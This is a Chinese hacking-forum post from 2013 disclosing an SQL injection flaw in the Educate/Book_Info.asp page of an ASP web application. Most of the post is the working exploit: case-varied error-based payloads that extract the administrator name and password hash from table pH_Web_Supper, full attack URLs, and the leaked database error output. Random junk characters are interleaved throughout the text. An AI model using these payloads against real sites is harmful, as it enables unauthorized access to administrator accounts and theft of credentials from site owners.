漏洞出现在Educate/Book_Info.asp " G- ]$ P1 B. G6 B: e1 ~+ u
7 D/ ^- t# j. z e* _1 h: [, |此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
1 E6 b6 n; L, C% J" T2 q6 C 7 p. D" A/ A; ?) ?
exp:如下
+ w1 ?7 c) {) l4 j7 [/ |查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
* B! N, [; n/ m0 c/ Y查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper). H3 E L. U, a0 w% x u
. q) D4 Y- A0 q+ U5 Y8 M( \4 h d3 Ehttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)6 b) N* ~4 ?' g4 y
( i- j8 V* }# g% _
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'1 L. B4 P4 i/ M! B5 h% G) B/ v* i
, Z q+ Q* d+ M1 U( c6 L% B7 Y将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。( h7 C9 \" e3 Y7 m0 ]4 ?7 P5 I
: t; N$ ?8 }4 [- s" d+ |
/Educate/Book_Info.asp,行 88 ^. [7 N; h$ i% P. G. b$ n
: \& U S- w6 W! c
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 n+ N1 n9 _9 d, L3 g! H; ~
- W) N" z5 O+ ~% J9 xMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
" S5 U4 a' p @7 O+ O9 M
, g+ ?: }; ^# E g* I+ i将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。6 \6 L( J4 L" z& B
$ t9 t. P8 L4 ]4 ^; f' z, q/Educate/Book_Info.asp,行 8& I+ C9 t" P# K. k
|
发表于 2013-2-16 21:44:16
收藏
支持
反对